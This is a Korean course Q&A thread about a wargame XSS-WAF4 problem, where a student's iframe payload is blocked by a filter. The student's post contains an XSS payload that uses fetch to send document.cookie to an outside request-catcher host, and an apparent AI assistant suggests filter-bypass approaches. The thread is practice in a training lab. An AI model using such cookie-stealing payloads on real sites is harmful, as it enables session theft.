XSS-WAF4 문제풀이
iframe을 써도 no hack이라고 나옵니다..
Answer 2
0
안녕하세요 🙂 혹시 페이로드를 어떻게 작성하셨나요?
0
<iframe srcdoc="<script>fetch('https://stlwdyv.request.dreamhack.games/?'+document.cookie)</script>"> 이렇게 했습니다
0
안녕하세요, 인프런 AI 인턴입니다. ohdongheon12님.
XSS-WAF4 문제에서 iframe 사용 시 “no hack”이라는 메시지가 나오는 문제로 고민 중이시군요. WAF(Web Application Firewall)가 설정되어 있을 때, iframe과 같은 태그가 필터링되는 상황은 흔히 발생할 수 있습니다. XSS 문제를 해결하기 위해서는 필터링 우회를 위한 다양한 테스트와 접근 방식이 필요합니다.
몇 가지 접근 방법을 안내드리자면:
인코딩 우회: HTML 엔티티 인코딩 또는 유니코드 변환을 통해 필터링을 우회할 수 있는 방법을 시도해 보세요.
자바스크립트를 통한 실행: 자바스크립트를 이용한 우회, 예를 들어
src속성에 자바스크립트를 직접 입력하여 실행을 유도하는 방식도 고려해 볼 수 있습니다.
이와 관련된 힌트나 해법은 강의 내 다양한 Q&A 게시판에서 도움이 될 수 있습니다. 특히, WAF 필터링 회피에 대한 다양한 사례와 기법이 공유되고 있으므로 아래의 참조 URL을 확인해 보시길 추천드립니다:
이 링크에서는 XSS 문제를 해결하는 다양한 접근 방법과 주의사항을 다룹니다. 이러한 사례를 통해 어떻게 문제를 해결할 수 있는지 살펴보세요.
저는 질문자님의 이해를 돕고자 지식공유자님의 기존 답변을 참고하여 유사한 답변 링크를 추천해드리고 있습니다.
현재 베타 기능으로 답변이 만족스럽지 않을 수 있는 점 양해 부탁드립니다. 🙏
추가적으로 궁금한 점이 있으시면, 이어서 질문해 주세요. 곧 지식공유자께서 답변해 주실 것입니다.
인증 후에도 동일 메시지가 보이네요
0
71
2
CRLF Injection 문제
0
85
2
discord email 인증
0
68
2
CRLF 질문 있습니다
0
69
2
Dom clobbering 관련 문의
1
95
2
디스코드 트랙 관련 문의
0
66
1
백틱 사용 이유가 뭐에요?
0
80
2
SQLi-WAF-5 강의
0
68
2
미션 어떻게 하는 거에요?
0
76
1
XSS 1번문제 질문
0
87
2
xss_WAF_4가 안 됩니다
0
73
2
백슬래시에 관하여
0
53
2
SQL Injection - Login
0
167
2
공백 우회 관련 질문 있습니다
0
84
2
제가 이해한게 맞는지 궁금합니다
0
55
2
XSS-WAF-4 문제 질문
0
87
2
디스코드 이메일 인증 문의드립니다
0
576
2
KnockOn에 접속할 수 없습니다
0
107
2
SQL Injection - DB 질문
0
83
2
디스코드에 들어가지지 않습니다
0
142
2
SQL Injection 실습
0
220
2
60번 게시글 질문
0
111
2
실습 내용에 nc도 나오는것 같은데 nc는 알아서 하는건가요?
0
113
2
현재 강의 DB접속 저희는 어떻게 하나요?
0
81
2